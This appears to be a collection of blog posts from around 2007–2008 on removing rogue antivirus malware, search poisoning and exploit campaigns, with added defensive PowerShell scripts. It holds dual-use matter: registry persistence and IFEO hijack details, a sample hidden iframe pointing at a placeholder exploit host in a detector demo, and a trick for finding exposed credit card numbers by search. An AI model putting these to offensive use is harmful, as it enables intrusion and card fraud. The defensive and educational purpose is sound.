Had another user who had been infected by the Antivirus XP 2008 malware. I noticed that both users had hit the same website at least once, myspacecdn.com; I haven’t checked it yet, as I don’t have a machine handy that I can blow out, so I will have to check it later. The main install file seems to be ccwjgn.dll, which gets run from the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify. It runs the popup from a program in the Windows TEMP folder to get you to launch the install. The process is listed as a .tmp in Task Manager, usually with a weird name like ttC.tmp.exe or something similar.
On this machine, however, they had also set an explorer.exe registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options, and Windows Explorer could not run. I am assuming they were redirecting it to run some other malware and then starting Explorer, but VirusScan had deleted the file they were using, so Windows just sat there. You could still run Task Manager by hitting Ctrl-Alt-Delete, and that allowed me to run regedit, navigate to the key and delete the explorer.exe value, which then allowed Windows Explorer to run. After the desktop loaded, the Antivirus XP popup came up; I ended the process using Task Manager, deleted all the files out of the Windows temp folder, and found the program/DLL files in the System32 folder, two of them this time, with names of the lphctp9j0ea5j.exe and blphctp9j0ea5.scr type. After rebooting I was able to delete the ccwjgn.dll file.
I then ran the latest version of Spybot, which found some other stuff and removed them. No more popups or nag screens trying to get her to install their malware.
Update: I thought I had it until I updated to Windows XP Service Pack 3, and after rebooting I received the daggone popup again. More deleting and rebooting; after a while I gave up and tried the free version of AVG. It found about 40 or so driver files that were infected and cleaned those, and she has been running Antivirus XP 2008-free for a couple of hours now. So, for everyone who just wants it removed without knowing how or why, run AVG, as Spybot doesn’t seem to clean it yet.
The other day I had a user call me to let me know her PC was getting an error message and that her co-worker had tried to fix it for her but couldn’t. The computer was off when I got there, and when it booted up it went to a blue screen of death with the problem listed as “Panic Stack Switch”. Although that is an actual error message, it made me believe it was a fake one, as I had never seen it before and had not searched for any occurrences online. While I was reading the error message, though, the user hit her spacebar and the blue screen immediately went away to show one of those “you’re infected” backgrounds that malware such as Win Antivirus 2008 uses. You can imagine my surprise, as the computer should not boot into Windows after a blue screen of death, so this was yet another indicator that malware was involved, and I just went about cleaning the machine.
It was infected with the AntiVirus, or Win AntiVirus, XP 2008 malware, and it was surprisingly simple to remove, certainly a lot easier than other infections I had dealt with, probably because Spybot and her antivirus software were blocking portions of it. All I had to do was delete the folder the malware was in (I believe it was called rchpcg or something similar), and then I used the Sysinternals program Autoruns to remove any programs that were set to run automatically that shouldn’t; a couple had names something like blphctp9j0ea5.scr or lphctp9j0ea5j.exe, don’t quote me on those. I also went ahead and removed some of those programs that run in the background just to check whether their software needs updating, etc., stuff no one really needs running all the time.
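As an added example (it is not code from either of the two write-ups above), the following PowerShell script checks the persistence points both posts describe: the Winlogon\Notify key, the Image File Execution Options key (a Debugger value under a subkey named after a program is the documented way to make Windows launch something else in its place, which is how explorer.exe was hijacked), processes running from a .tmp.exe in a Temp folder, and System32 files matching the lphc*/blphc* naming seen on both machines. It is read-only, assumes PowerShell 2 or later run from an elevated prompt, and the file-name pattern is an assumption generalised from the two names the posts quote.

```powershell
# Added example, not from the original posts: read-only triage of the
# Antivirus XP 2008 persistence points described above. Run elevated.
function Get-AntivirusXpPersistence {
    $findings = @()

    # 1. Winlogon\Notify: each subkey's DLLName is loaded into winlogon.exe
    #    at logon (the post's ccwjgn.dll lived here). Report every entry;
    #    the legitimate ones on XP are few and all sit in System32.
    $notify = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify'
    if (Test-Path $notify) {
        foreach ($key in Get-ChildItem $notify -ErrorAction SilentlyContinue) {
            $dll = (Get-ItemProperty $key.PSPath -ErrorAction SilentlyContinue).DLLName
            $findings += New-Object PSObject -Property @{
                Location = 'Winlogon\Notify'; Name = $key.PSChildName; Value = $dll }
        }
    }

    # 2. Image File Execution Options: a Debugger value under a subkey named
    #    after a program makes Windows start the "debugger" instead. An entry
    #    for explorer.exe is what kept the desktop from loading in the post.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($key in Get-ChildItem $ifeo -ErrorAction SilentlyContinue) {
        $dbg = (Get-ItemProperty $key.PSPath -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            $findings += New-Object PSObject -Property @{
                Location = 'IFEO Debugger'; Name = $key.PSChildName; Value = $dbg }
        }
    }

    # 3. Running processes whose image sits in a Temp folder or is named
    #    *.tmp.exe (the ttC.tmp.exe pattern). Path cannot be read for some
    #    system processes; those are skipped rather than reported.
    foreach ($proc in Get-Process) {
        $path = try { $proc.Path } catch { $null }
        if ($path -and ($path -match '\\Temp\\' -or $path -match '\.tmp\.exe$')) {
            $findings += New-Object PSObject -Property @{
                Location = 'Process in Temp'; Name = $proc.ProcessName; Value = $path }
        }
    }

    # 4. System32 files matching the lphc*/blphc* naming. The pattern is an
    #    assumption generalised from the two file names quoted in the posts.
    foreach ($file in Get-ChildItem "$env:SystemRoot\System32" -ErrorAction SilentlyContinue) {
        if (-not $file.PSIsContainer -and $file.Name -match '^b?lphc') {
            $findings += New-Object PSObject -Property @{
                Location = 'System32 lphc*'; Name = $file.Name; Value = $file.FullName }
        }
    }
    return $findings
}

Get-AntivirusXpPersistence | Format-Table Location, Name, Value -AutoSize
```

The script only lists what it finds; removing an entry (for instance the explorer.exe subkey under Image File Execution Options that the first post deleted with regedit) is a separate, deliberate step once you have confirmed the entry is not something legitimate.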
Yesterday I mentioned that some Google search results contained many malicious sites trying to, among other things, install Spy-shredder, a rogue antispyware program. Google removed many of those sites, but according to the Sunbelt Blog, the same group and a new group are now re-poisoning the search results with fresh .cn domain sites. The new group appears to be trying to get traffic to make money from, using affiliate programs, etc.
Google has removed the sites responsible for the recent massive Google poisoning attack.
However, we’re seeing indications that another attack may be on the way. We have seen another spate of websites freshly registered, using the similar .cn domains. There seem to be two different groups here. Source: HEADS UP: More Google poisoning on the way?
My advice from yesterday still stands: watch for the gibberish domain names, and if it doesn’t make sense when you look at it, don’t click on it. They noted that the sites are not serving any exploits, but this could change very quickly at any time.
Sunbelt Software, one of the leading developers of security software and hardware, has found large numbers of websites that exist only to stuff malware onto your computer, and these websites are listed high in the results for search terms on search engines like Google, Yahoo and Live. A user whose patches are not up to date who clicks on one of these websites will be force-fed a diet of malware that could cause their machine to just die, or worse, monitor and track everything they do online.
The good news is, if you are fully patched, you shouldn’t have much to worry about; also, if you actually look at the websites you are going to visit before you click them, you can tell whether they are good results or not. All of the websites I have seen listed are nonsense names, .cn domain names, etc. Check out this image that I grabbed from the Sunbelt site.
See all of the domain names in the highlighted red boxes? Those are the types of domains they are using, for example lkasjdfkjt.com, so don’t click on any of those links; also be careful of the .cn domain names, as they are using many of those. Google has been notified of the problem and has already removed some, but I can still find some of the sites right now, so there is more work to be done.
As the guy from Hill Street Blues used to say, “Hey, let’s be careful out there.”
Here are some mentions about this problem on the Sunbelt and other sites.
BREAKING: Massive amounts of malware redirects in searches: the original post about this problem from Sunbelt Software. Here is a follow-up post from them: Malware redirects: The aftermath.
Update: Subverted search sites lead to massive malware attack in progress Trojans, rootkits, password stealers hit users who click on a bad link after a search.
Malware Poisoning Results for Innocent Searches Tens of thousands of malware-serving pages, crafted to reach a high search engine ranking, are showing up in the first page of returns from Google, Yahoo and Live.
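Both posts above boil the advice down to “if the domain name looks like gibberish, don’t click it”. The PowerShell function below is an added example, not code from the posts or from Sunbelt, that turns that eyeball test into two measurable signals on the label before the top-level domain: the share of vowels among its letters, and the longest unbroken run of consonants (lkasjdfkjt has one of seven). The thresholds and the sample list are assumptions chosen for illustration; a real name such as “schwartz” will trip the vowel test, so treat a hit as a reason to look closer, not as a verdict.

```powershell
# Added example, not from the original posts: a crude "does this domain look
# like gibberish?" heuristic. All thresholds are assumptions for illustration.
function Test-GibberishDomain {
    param([Parameter(Mandatory=$true)][string]$Domain)

    # Reduce a URL or host name to the label just before the top-level domain.
    $hostName = (($Domain -replace '^[a-z]+://', '') -replace '/.*$', '').ToLower()
    $labels = $hostName.Split('.')
    $label = if ($labels.Length -ge 2) { $labels[$labels.Length - 2] } else { $hostName }
    $tld   = if ($labels.Length -ge 2) { $labels[$labels.Length - 1] } else { '' }
    $letters = $label -replace '[^a-z]', ''

    # Signal 1: share of vowels among the letters (y counted as a vowel).
    $vowels = [regex]::Matches($letters, '[aeiouy]').Count
    $vowelRatio = if ($letters.Length -gt 0) { $vowels / $letters.Length } else { 1 }

    # Signal 2: longest unbroken run of consonants, as in "lkasjdfkjt".
    $longestRun = 0
    foreach ($m in [regex]::Matches($letters, '[^aeiouy]+')) {
        if ($m.Length -gt $longestRun) { $longestRun = $m.Length }
    }

    # Labels under six letters are left alone: too little text to judge.
    $suspicious = ($letters.Length -ge 6) -and (($vowelRatio -lt 0.25) -or ($longestRun -ge 5))

    New-Object PSObject -Property @{
        Domain              = $Domain
        Label               = $label
        Tld                 = $tld
        VowelRatio          = [math]::Round($vowelRatio, 2)
        LongestConsonantRun = $longestRun
        Suspicious          = $suspicious
    }
}

# Constructed sample: the example domain from the post plus ordinary names
# and a made-up .cn registration.
$samples = 'lkasjdfkjt.com', 'http://sunbeltblog.blogspot.com/', 'google.com', 'qwrtzpkd.cn'
$samples | ForEach-Object { Test-GibberishDomain $_ } |
    Format-Table Domain, Label, Tld, VowelRatio, LongestConsonantRun, Suspicious -AutoSize
```

The Tld column is returned separately so a caller can weigh the .cn registrations both posts single out as an extra signal without hard-coding that into the heuristic itself.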
Here are some of the latest technology stories floating around the internet today.
Wal-Mart to begin selling Dell PCs Initial word was that the Dell PCs would go on sale this weekend. A representative for Wal-Mart on Thursday morning said that the PCs are slated to be in stores on June 10, with two models each offered in a bundle priced below $700. Details on the PCs were not provided. Sam’s Club and Wal-Mart Canada stores will carry different models.
Copying HD DVD and Blu-ray discs may become legal Under a licensing agreement in its final stages, consumers may get the right to make several legal copies of HD DVD and Blu-ray Disc movies they’ve purchased, a concession by the movie industry that may quell criticism that DRM (digital rights management) technologies are too restrictive.
This is crazy. I can’t believe I just posted a story that said users MAY get the right to copy their OWN property. The movie and music industries suck and they are killing it all by themselves.
Flexible, full-color OLED On May 24, Sony unveiled what it is calling the world’s first flexible, full-color organic electroluminescent display (OLED) built on organic thin-film transistor (TFT) technology. OLEDs typically use a glass substrate, but Sony researchers developed new technology for forming organic TFT on a plastic substrate, enabling them to create a thin, lightweight and flexible full-color display.
Dell Offers Three Consumer Systems With Ubuntu 7.04 Later today, Dell will offer U.S customers three different systems with Ubuntu 7.04 installed: the XPS 410n and Dimension E520n desktops and the Inspiron E1505n notebook. These systems will be available at www.dell.com/open by 4pm CST today. Starting price for the E520n desktop and the E1505n notebook is $599; the XPS 410n starts at $849.
Why Are CC Numbers Still So Easy To Find? Some “script kiddie” tricks still work after all: Take the first 8 digits of a standard 16-digit credit card number. Search for them on Google in “nnnn nnnn” form. Since the 8-digit prefix of a given card number is often shared with many other cards, about 1/4 of credit card numbers in my random test, turned up pages that included other credit card numbers, and about 1 in 10 turned up a “treasure trove” of card numbers that were exposed through someone’s sloppily written Web app.
DOG (Distrust/Disdain of Google) moves in Me? Google is too secretive. Too unwilling to engage. Too aloof. Oh, and Eric Schmidt, Google’s CEO, has lost touch with how normal people think (if these quotes are correct, and that’s a big “if”). If they are correct I think it’s evidence that he’s been hanging around too many advertising execs lately. Their goal is to put impulses into your mind so you take certain actions (like buy Diet Coke instead of Diet Pepsi). Believe it or not advertising execs talk like that. So, when Eric is reported to have said, during a visit to Britain this week: “The goal is to enable Google users to be able to ask the question such as ‘What shall I do tomorrow?’ and ‘What job shall I take?’” we all get a little freaked out. We don’t want Google to know that much about us.
Windows XP SP3 in the Works – Microsoft Confirms They have confirmed Service Pack 3, but the date in that article is wrong; according to Microsoft the release date will be the first half of 2008, whatever that means.
Cyber Crooks Hijack Activities of Large Web-Hosting Firm Brian Krebs talks about IPOWER Inc, one of the hosting companies that was recently featured by Stopbadware.org as among the largest hosting companies currently silently installing malicious software, as detailed here: Exposing Hosting Companies with Malicious Websites. Brian says organized crime is responsible, and IPOWER says it was one compromised server run by another company.
Google is failing the Microsoft litmus test If you want to evaluate the “evil” quotient of any company’s strategy/behavior, consider how you’d feel about it if it were Microsoft in the driver’s seat.
Vista no panacea for PC sales Although Microsoft has characterized itself as happy with Vista adoption so far, and Bill Gates said last week at WinHEC that Microsoft had shipped 40 million copies, the release of the new operating system has not resulted in a significant bump in PC sales.
Skype Worm Variant Targets Other Instant Messaging Clients Yesterday, I discovered what appears to be a new collection of “Skype Worm” infection binaries in circulation – it uses the tried and tested methods employed by similar infections over the past few months, with the ultimate payload being the Stration Worm. Aside from that, there’s another little surprise waiting but we’ll get to that shortly…
Looks like attackers are increasing their use of the Windows Animated Cursor Vulnerability we posted about a while back (the link to the patch is here), with one group pushing it in the United States and Europe, and another, Chinese, group pushing it in China. Two different attempts to exploit the same vulnerability.
There are two main attacks that comprise the majority of these sites. The first set, we believe, is one of the first groups to start using the zero-day exploits in the wild. These are attacks that started in the China region and appear to be created by groups within the Asia Pacific Region. The attackers have compromised hundreds of machines and placed IFRAMEs back to the main servers that host the exploit code. In most cases the payload and motivation of these attacks is to gather credentials for online games such as Lineage. Lineage is a very popular online game in Asia.
The second set of attacks, which started just a couple of days ago, appears to be from a group in Eastern Europe. This group has been placing exploit code on sites for many years now and has a very resilient infrastructure. They have used WMF, VML, and several other exploits in their routines previously. As of now they have also added the ANI attacks to their arsenal. The payload and motivation is somewhat different, however, as they are more known to install rootkits and crimeware which is designed to install form grabbing software and keyloggers in order to compromise end-user banking details. Also in the past they have installed fake anti-spyware software as a distraction and as a means to falsify someone into acquiring some anti-spyware software. Source: A tale of two ANI attacks: Same exploit, different motives, different targets
It’s amazing to me that there could be groups doing this stuff for years and getting away with it, no doubt helped by people creating websites and then abandoning them for years. Google recently started removing the links for sites like these from the natural search results, so, hopefully, most of the sites carrying their code are or will be removed soon.
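The quoted report says the compromised sites were seeded with IFRAMEs pointing back at the servers hosting the exploit code, and the paragraph above notes how long such injections survive on abandoned sites. As an added example (not code from the post or from the report’s authors), the PowerShell function below scans saved HTML for the shape an injected frame usually takes: zero or one pixel in size, hidden by style, or pointing at a host that is not one of your own. The function name, the own-host list and the sample page with its exploit-host.example placeholder are all constructed for this illustration.

```powershell
# Added example, not from the original post: scan saved HTML for IFRAMEs that
# look injected (hidden, tiny, or pointing at a host that is not your own).
function Find-SuspiciousIframe {
    param(
        [Parameter(Mandatory=$true)][string]$Html,
        [string[]]$OwnHosts = @()
    )
    $results = @()
    foreach ($m in [regex]::Matches($Html, '(?is)<iframe\b[^>]*>')) {
        $tag = $m.Value
        $src = ''
        if ($tag -match '(?i)\bsrc\s*=\s*["'']?([^"''\s>]+)') { $src = $Matches[1] }
        $srcHost = ''
        if ($src -match '^(?:https?:)?//([^/:?#]+)') { $srcHost = $Matches[1].ToLower() }

        $reasons = @()
        # width/height of 0 or 1 pixel: a frame nobody is meant to see.
        if ($tag -match '(?i)\b(width|height)\s*=\s*["'']?0*[01]\b') { $reasons += 'tiny size' }
        # Hidden by inline style.
        if ($tag -match '(?i)display\s*:\s*none|visibility\s*:\s*hidden') { $reasons += 'hidden by style' }
        # Absolute src on a host that is not one of ours (relative srcs pass).
        if ($srcHost -and ($OwnHosts -notcontains $srcHost)) { $reasons += "external host $srcHost" }

        if ($reasons.Length -gt 0) {
            $results += New-Object PSObject -Property @{
                Tag = $tag; Source = $src; Reasons = ($reasons -join ', ') }
        }
    }
    return $results
}

# Constructed sample page: one legitimate relative embed and one injected,
# invisible frame to a placeholder exploit host.
$page = @'
<html><body>
<h1>Club news</h1>
<iframe src="/schedule.html" width="600" height="400"></iframe>
<iframe src="http://exploit-host.example/ani/" width="0" height="0" style="display:none"></iframe>
</body></html>
'@

Find-SuspiciousIframe -Html $page -OwnHosts 'www.example.com' |
    Format-Table Source, Reasons -AutoSize
```

Run over a site's document root with Get-Content on each .html or .php file, the same function gives a webmaster a quick inventory of every frame that points off-site, which is the first thing worth checking on a site that has been left unattended.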
Websense Security Labs announced that a new version of the Warezov/Stration set of malicious code is spreading through Skype. The Skype message itself does not infect the machine, but it sends a URL linking to a download of the code to everyone on the user’s contact list. The code, once run, opens backdoors on the system and downloads more malicious code.
“Spammed” users receive a message that says “Check up this” and sends them a link to download the code. If a user clicks on the link, they are redirected until they eventually download a file named file_01.exe and are prompted to run the program, as you usually are when you download something. The Trojan tries to send an email message through a Yahoo mail server, probably to let the creator know it has infected another computer, but the message fails because the mail server is not active.
This is the same method of attack as in this notice on the F-Secure site; it is using a new release of the code and new download URLs.
Google has started a public service that has been a long time coming, if you ask me: they are putting links that say “This site may harm your computer” on search results. Check out this site search for a good example, kohit.net, and guess what, if you click on any of the links you still can’t get there. You have to actually copy the URL and paste it into the address bar, something most people probably won’t do.
I mentioned in August last year that Google started to show malware warnings if you click on a search result from a harmful site. Now Google shows a message below the title of a search result: “This site may harm your computer.” Even if you click on the title, you won’t be able to visit the site: Google explains to you once again that the site could be dangerous and recommends that you visit other search results or change your query. The only way to visit the site is to copy the URL and paste it in the address bar, which is not an obvious or a trivial task for an ordinary computer user. Source: Google Flags Pages that Install Malicious Software
This is great. I salute Google and the fact that they are trying to protect their users, as some of us ordinary webmasters do. Kudos, Google. Here is the explanation from Google Help.
This warning message appears with search results that we’ve identified as sites that may install malicious software on your computer. We want our users to feel safer when they search the web, and we’re continuously working to identify such dangerous sites and increase protection for our users.
Malicious software is often installed without your knowledge or permission when you visit these sites. Some examples of malicious software include programs that delete data on your computer, steal personal information such as passwords and credit card numbers, or alter your search results. Source: Why do some of my search results say “This site may harm your computer?”
This should save lots of users from clicking on bad links, and it is something that should’ve been done a long time ago.
Websense Security Labs has discovered that the official website of Dolphin Stadium has been compromised with malicious code. The Dolphin Stadium is currently experiencing a large number of visitors, as it is the home of Sunday’s Super Bowl XLI. The site is linked from numerous official Super Bowl websites and various Super Bowl-related search terms return links to the site.
The file that is downloaded is a NsPack-packed Trojan keylogger/backdoor, providing the attacker with full access to the compromised computer. The filename is w1c.exe and its MD5 is ad3da9674080a9edbf9e084c10e80516 Source: Malicious Website: Super Bowl XLI / Dolphin Stadium
They said they have notified the owner, but the malicious content is still being delivered. A screenshot is available on the Websense site. Do not visit the Dolphin Stadium website unless you want a hacker to get full access to your computer, or you are sure you won’t be infected.
Your computer is like this big red shiny apple, and spyware is the ugly fat green worm eying it. If the apple has no protection (insecticide) the worm will invade it, take chunks out of here and there until the apple reaches a point where it cannot be sold or eaten. It gets thrown away & destroyed.
Spyware will condemn a computer to the same fate as the apple: useless and unwanted. Unfortunately, the Internet has become a field of nothing but ugly worms. Sure, there are some clear patches here and there, but for the most part, if your computer has no spyware protection it might as well be an apple left in the middle of a worm farm. Yes. It’s that bad.
It didn’t used to be that bad; however, spyware has grown ever more complicated over the years. It used to be a simple feat to rid a computer of it. However, spyware is now being packaged (bundled) into software from even the most seemingly innocuous places and companies.
For example, Sony has just landed (November, 2005) in a pot of hot-water for releasing a software package that installed a root level spyware program whereby Sony neither disclosed its installation, nor offered a means to uninstall it until the public demanded it. Many companies sadly have alternative agendas counter to their public personas.
A computer actively surfing the internet with no spyware protection will become so infected with spyware in no time that it will essentially become unusable. Try to go to Google to do a search. Nope. Try to do some shopping. Nope. Try to disconnect from the Internet. Nope, can’t do that either. Spyware will control a computer, track wherever the surfer visits, and open a nice and wide two-way door for uploading and downloading whatever data it wants.
All hope is not lost. There are some good insecticides out there to protect your shiny apple, as well as the hair on your head; because if you get a malicious spyware program on your computer, you’ll be pulling it out by the handfuls.
One of the best programs out there for preventing the installation of spyware, as well as cleaning up spyware-infected computers, is a software package from Panda Software (www.pandasoftware.com). Panda Software fully understands how spyware works, so well in fact that their Platinum Internet Security 2006 Suite won the coveted PC World “Best Buy” title in their November 2005 magazine issue.
Panda Software went up against all the big names: Norton, McAfee, Trend Micro, and Zone Labs, and walked away as the top choice. The Panda Platinum Internet Security 2006 Suite was the only one to eliminate 100% of running processes, ahead of all the others. It is a surefire worm killer.
More details about the recent report as well as where and how to buy it can be located here.